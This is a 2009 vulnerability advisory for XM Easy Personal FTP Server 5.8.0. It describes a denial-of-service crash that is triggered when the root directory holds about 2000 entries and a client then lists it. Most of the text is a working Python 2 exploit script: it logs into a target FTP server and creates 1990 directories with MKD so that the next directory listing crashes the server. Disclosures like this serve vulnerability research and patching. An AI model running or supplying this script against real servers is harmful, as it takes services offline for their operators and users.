###################
Date of Discovery: 24-Nov-2009
Credits: leinakesi[at]gmail.com
Vendor: Dxmsoft
*******************************************************************************
Affected: XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:
XM Easy Personal FTP Server fails to handle more than 2000 files or folders in the root directory.
*******************************************************************************
Details:
If you can log on to the server, take the following steps and the server will crash, which leads to a DoS.
1. Upload 2000 files or folders.
2. Close the current connection.
3. Use an FTP client to reconnect to the server:
   user ...
   pass ...
   port ...
   list ...
   crash!!!!!!
*******************************************************************************
Exploit example:
1. Upload 2000 folders.

#!/usr/bin/python
# Python 2 script (print statements, str sockets).
import socket
import sys

def Usage():
    print ("Usage: ./expl.py host user pass\n")
    print ("Example: ./expl.py 192.168.48.183 anonymous anonymous\n")

if len(sys.argv) != 4:
    Usage()
    sys.exit(1)
else:
    hostname = sys.argv[1]
    username = sys.argv[2]
    passwd = sys.argv[3]

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    sock.connect((hostname, 21))
except:
    print ("Connection error!")
    sys.exit(1)

r = sock.recv(1024)                 # server banner
sock.send("user %s\r\n" % username)
r = sock.recv(1024)
sock.send("pass %s\r\n" % passwd)
r = sock.recv(1024)                 # read the login reply so each later reply lines up with its mkd
print "[+] " + r + "\r\n"

# Ten name prefixes x 199 lengths = 1990 directories named a, aa, aaa, ... j...j
for c in "abcdefghij":
    for i in range(1, 200):
        cmd = "mkd " + c * i + "\r\n"
        sock.send(cmd)
        print "[-] " + cmd
        r = sock.recv(1024)
        print "[+] " + r + "\r\n"

sock.close()
sys.exit(0)

2. Use an FTP client to reconnect to the server, for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir